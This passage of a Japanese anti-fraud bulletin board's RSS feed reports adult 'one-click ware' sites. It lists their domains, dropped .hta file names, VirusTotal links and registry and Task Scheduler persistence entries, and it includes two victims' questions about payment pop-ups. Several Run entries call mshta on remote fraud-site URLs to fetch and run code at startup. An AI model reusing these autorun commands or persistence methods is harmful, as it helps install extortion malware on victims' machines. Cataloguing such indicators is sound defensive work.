target="_blank">http://erotic-porn.info/reg2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh</a>  Startup on Registory  HKCU:Run SystemBoot74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWrite74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh C:\Users\Cerberus\SoftRecovery\RegWrite.lnk   </description>
  <dc:date>2011-12-20T22:02+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>エリアーヌ</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://windowpane.twittnow.net/" target="_blank">http://windowpane.twittnow.net/</a> <a href="http://twittnow.net/" target="_blank">http://twittnow.net/</a> <a href="http://" target="_blank">http://</a>*.twittnow.net/  File name 「nudybeach_1324202638.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=20841ce8a2a2e4401bafb99199aab9b87741bebc72e959daccb22d8bdeb0ae14-1324202296" target="_blank">http://www.virustotal.com/file-scan/report.html?id=20841ce8a2a2e4401bafb99199aab9b87741bebc72e959daccb22d8bdeb0ae14-1324202296</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [thanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587] C:\Users\Cerberus\AppData\Roaming\Microsoft    hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs  Startup on Registory  HKCU:Run thanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587 C:\Users\Cerberus\AppData\Roaming\Microsoft    hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Microsoft    hanks_e4612a9a925fa033d8b197137e580f132f8fde09a867c587.vbs&lt;/Command&gt;       </description>
  <dc:date>2011-12-18T20:19+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>WMV</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://apoplexy.saladinemily.net/" target="_blank">http://apoplexy.saladinemily.net/</a> <a href="http://saladinemily.net/" target="_blank">http://saladinemily.net/</a> <a href="http://" target="_blank">http://</a>*.saladinemily.net/  File name 「pinkylove_1324291498.hta」 Kaspersky 9.0.0.837 2011.12.19 Trojan-Downloader.HTA.Agent.bu  <a href="http://www.virustotal.com/file-scan/report.html?id=bae91572aa98af01ed653d80847a021bcb6a942d24876541a7b63ca270240ec3-1324291027" target="_blank">http://www.virustotal.com/file-scan/report.html?id=bae91572aa98af01ed653d80847a021bcb6a942d24876541a7b63ca270240ec3-1324291027</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs  Startup on Registory HKCU:Run placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Media&lt;/Command&gt;    &lt;Arguments&gt;Center Programs\placeless_22ad41cfb09ea34c60bfd60f2d436754a40dda835cdaf8f4.vbs&lt;/Arguments&gt;     </description>
  <dc:date>2011-12-19T20:47+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>JPPorn</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://babe-porn.info/" target="_blank">http://babe-porn.info/</a>  File name 「MovieID_vLEjaNUME2SvzeMUWrUSlCwPOdHSoe9T.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=d1b6ecc49ab5c2c5a1415a41d26ecf08fd4eed62a0f3a2add16ce3ce48ad5fdd-1323592747" target="_blank">http://www.virustotal.com/file-scan/report.html?id=d1b6ecc49ab5c2c5a1415a41d26ecf08fd4eed62a0f3a2add16ce3ce48ad5fdd-1323592747</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [system_boot_vLEjaNUME2SvzeMUWrUSlCwPOdHSoe9T] C:\Windows\system32\mshta <a href="http://babe-porn.info/reg2.php?cccid=vLEjaNUME2SvzeMUWrUSlCwPOdHSoe9T" target="_blank">http://babe-porn.info/reg2.php?cccid=vLEjaNUME2SvzeMUWrUSlCwPOdHSoe9T</a>  </description>
  <dc:date>2011-12-11T20:10+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルト見放題</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://crane.castleviolet.net/" target="_blank">http://crane.castleviolet.net/</a> <a href="http://castleviolet.net/" target="_blank">http://castleviolet.net/</a> <a href="http://" target="_blank">http://</a>(いろいろ出てくる).castleviolet.net/  File name 「tororinko_1323430771.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=9cb0b13834917abcb2902fce8b8eeb400f4dad07ad74f0f042293f763e574609-1323430440" target="_blank">http://www.virustotal.com/file-scan/report.html?id=9cb0b13834917abcb2902fce8b8eeb400f4dad07ad74f0f042293f763e574609-1323430440</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [whity_505c8ef8ee65c924f27ca30270e4936ca582c3dd490bb421] C:\Users\Cerberus\AppData\Roaming\Macromedia\whity_505c8ef8ee65c924f27ca30270e4936ca582c3dd490bb421.vbs  Startup on Registory  HKCU:Run whity_505c8ef8ee65c924f27ca30270e4936ca582c3dd490bb421 C:\Users\Cerberus\AppData\Roaming\Macromedia\whity_505c8ef8ee65c924f27ca30270e4936ca582c3dd490bb421.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Macromedia\whity_505c8ef8ee65c924f27ca30270e4936ca582c3dd490bb421.vbs&lt;/Command&gt;     </description>
  <dc:date>2011-12-09T21:57+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>Adult.Movie-Aconite</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://gentian-movie.com/" target="_blank">http://gentian-movie.com/</a>  File name 「movie_l1323171927.hta」 Kaspersky 9.0.0.837 2011.12.05 HEUR:Trojan.Script.Generic  <a href="http://www.virustotal.com/file-scan/report.html?id=4f04a5fba325c6627dca5ad9d53da4ffb1eaa141085350611cf8b25436c65377-1323171424" target="_blank">http://www.virustotal.com/file-scan/report.html?id=4f04a5fba325c6627dca5ad9d53da4ffb1eaa141085350611cf8b25436c65377-1323171424</a>  C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [hexalia] C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\hexalia\hexalia.hta&quot;  Startup on Registory HKCU:Run hexalia C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\hexalia\hexalia.hta&quot;   </description>
  <dc:date>2011-12-06T21:09+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>Avstyle</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://omelet.milionsunnywave.net/" target="_blank">http://omelet.milionsunnywave.net/</a> <a href="http://milionsunnywave.net/" target="_blank">http://milionsunnywave.net/</a> <a href="http://" target="_blank">http://</a>*.milionsunnywave.net/  File name 「playgirl_1322280548.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=27a25b075929d1dc52a12920c64eb633b733281a7ca7433e51cbdc19c4c58204-1322280026" target="_blank">http://www.virustotal.com/file-scan/report.html?id=27a25b075929d1dc52a12920c64eb633b733281a7ca7433e51cbdc19c4c58204-1322280026</a> C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [gungun_391e76c687ddad93701049f4df2907e247a6d7920c0e9072] C:\Users\Cerberus\AppData\Roaming\AVG2012\gungun_391e76c687ddad93701049f4df2907e247a6d7920c0e9072.vbs  Startup on Registory HKCU:Run gungun_391e76c687ddad93701049f4df2907e247a6d7920c0e9072 C:\Users\Cerberus\AppData\Roaming\AVG2012\gungun_391e76c687ddad93701049f4df2907e247a6d7920c0e9072.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\AVG2012\gungun_391e76c687ddad93701049f4df2907e247a6d7920c0e9072.vbs&lt;/Command&gt;   -----------------------------------------------------------  <a href="http://shimeji.vivitube.net/" target="_blank">http://shimeji.vivitube.net/</a> <a href="http://vivitube.net/" target="_blank">http://vivitube.net/</a> <a href="http://" target="_blank">http://</a>*.vivitube.net/  File name 「osyaburi_1322483974.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=e3f42474f8993db9e0e10fddf2f082334c1391361f246851d062bf2032e3c521-1322483767" target="_blank">http://www.virustotal.com/file-scan/report.html?id=e3f42474f8993db9e0e10fddf2f082334c1391361f246851d062bf2032e3c521-1322483767</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [matutake_913e28fe285123695ae13a2388498dad07ef81d75c877a6d] C:\Users\Cerberus\AppData\Roaming\\matutake_913e28fe285123695ae13a2388498dad07ef81d75c877a6d.vbs  Startup on Registory HKCU:Run matutake_913e28fe285123695ae13a2388498dad07ef81d75c877a6d C:\Users\Cerberus\AppData\Roaming\\matutake_913e28fe285123695ae13a2388498dad07ef81d75c877a6d.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\\matutake_913e28fe285123695ae13a2388498dad07ef81d75c877a6d.vbs&lt;/Command&gt;   ----------------------------------------------------------  <a href="http://pineapple.hamcock.net/" target="_blank">http://pineapple.hamcock.net/</a> <a href="http://hamcock.net/" target="_blank">http://hamcock.net/</a> <a href="http://" target="_blank">http://</a>*.hamcock.net/  File name 「soaplife_1323076010.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=1178a50023d184f622183b01285d075e1a39d4a094d5938e0d02ec752e61d70a-1323075681" target="_blank">http://www.virustotal.com/file-scan/report.html?id=1178a50023d184f622183b01285d075e1a39d4a094d5938e0d02ec752e61d70a-1323075681</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [avcinema_f8971de38337b00bbb4d8f64c8dfd34d088368769907e502] C:\Users\Cerberus\AppData\Roaming\\avcinema_f8971de38337b00bbb4d8f64c8dfd34d088368769907e502.vbs  Startup on Registory  HKCU:Run avcinema_f8971de38337b00bbb4d8f64c8dfd34d088368769907e502 C:\Users\Cerberus\AppData\Roaming\\avcinema_f8971de38337b00bbb4d8f64c8dfd34d088368769907e502.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\\avcinema_f8971de38337b00bbb4d8f64c8dfd34d088368769907e502.vbs&lt;/Command&gt;                    </description>
  <dc:date>2011-11-26T13:33+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>センチュリー</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://shovel.iodineclip.net/" target="_blank">http://shovel.iodineclip.net/</a> <a href="http://iodineclip.net/" target="_blank">http://iodineclip.net/</a> <a href="http://" target="_blank">http://</a>(いろいろ出てくる).iodineclip.net/  File name 「gabaman_1321785787.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=1c00848b99e32c1858cacdc8bdb75bf9ccdb0fe8ccae9c8d58c5aa709793d5f6-1321785443" target="_blank">http://www.virustotal.com/file-scan/report.html?id=1c00848b99e32c1858cacdc8bdb75bf9ccdb0fe8ccae9c8d58c5aa709793d5f6-1321785443</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [jastin_6c53a57ef721964b7264982fffe4b7dddd5be70bd59d9c72] C:\Users\Cerberus\AppData\Roaming\\jastin_6c53a57ef721964b7264982fffe4b7dddd5be70bd59d9c72.vbs  Startup on Registory HKCU:Run jastin_6c53a57ef721964b7264982fffe4b7dddd5be70bd59d9c72 C:\Users\Cerberus\AppData\Roaming\\jastin_6c53a57ef721964b7264982fffe4b7dddd5be70bd59d9c72.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\\jastin_6c53a57ef721964b7264982fffe4b7dddd5be70bd59d9c72.vbs&lt;/Command&gt;     </description>
  <dc:date>2011-11-20T20:14+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>無題</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>入会ありがとうございます。 内容は お支払期日までとでてきます  と何分おきかに出てくるのですがどうすればいいですか？  htt　　p://kiramata.net/member/pay.php 2ます開けてます  このサイトです  このサイトはワンクリック詐欺ですか？     </description>
  <dc:date>2011-11-10T22:29+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>House</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://www.adult-hs.com/" target="_blank">http://www.adult-hs.com/</a>  File name 「video55195083.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=1553a15a5e960d10a779bc0ef3c25a297ebb8939d1e7fba4ea719db69fe015af-1321100096" target="_blank">http://www.virustotal.com/file-scan/report.html?id=1553a15a5e960d10a779bc0ef3c25a297ebb8939d1e7fba4ea719db69fe015af-1321100096</a>  C:\Windows\System32\mshta.exe O4 - HKCU\..\Run: [webcsdat] mshta &quot;C:\ProgramData\csdat\544XX0H5.hta&quot;  Startup on Registory  HKCU:Run webcsdat mshta &quot;C:\ProgramData\csdat\544XX0H5.hta&quot;  </description>
  <dc:date>2011-11-12T21:42+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ワンクリック詐欺？</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description><a href="http://bfuage.blog.so-net.ne.jp/2011-09-28" target="_blank">http://bfuage.blog.so-net.ne.jp/2011-09-28</a>  上のブログで長澤まさみの動画を見ようと再生マークをクリックし、「はい」で進んでいったら登録完了になってしまいました。  何回もクリックしてしまったが、これはワンクリック詐欺にあたりますか？ 無視しても大丈夫でしょうか？</description>
  <dc:date>2011-11-19T15:59+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>エリアーヌ</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://path.vanillax.net/" target="_blank">http://path.vanillax.net/</a> <a href="http://" target="_blank">http://</a>(たぶんいろいろ出てくる).vanillax.net/  File name 「mania_1320664341.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=c32583cc2cd7bcba106d4106a7e9be83eb938ef7fe8667d1d594aa759ed92137-1320664294" target="_blank">http://www.virustotal.com/file-scan/report.html?id=c32583cc2cd7bcba106d4106a7e9be83eb938ef7fe8667d1d594aa759ed92137-1320664294</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [everybody_8dd03c04d856319a7f64ffd53d75e148ebdf2e3d0682f646] C:\Users\Cerberus\AppData\Roaming\Microsoft\everybody_8dd03c04d856319a7f64ffd53d75e148ebdf2e3d0682f646.vbs  Startup on Registory  HKCU:Run everybody_8dd03c04d856319a7f64ffd53d75e148ebdf2e3d0682f646 C:\Users\Cerberus\AppData\Roaming\Microsoft\everybody_8dd03c04d856319a7f64ffd53d75e148ebdf2e3d0682f646.vbs  Task Scheduler library　 &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Microsoft\everybody_8dd03c04d856319a7f64ffd53d75e148ebdf2e3d0682f646.vbs&lt;/Command&gt;      </description>
  <dc:date>2011-11-07T21:33+09:00</dc:date>
 </item>
</rdf:RDF>

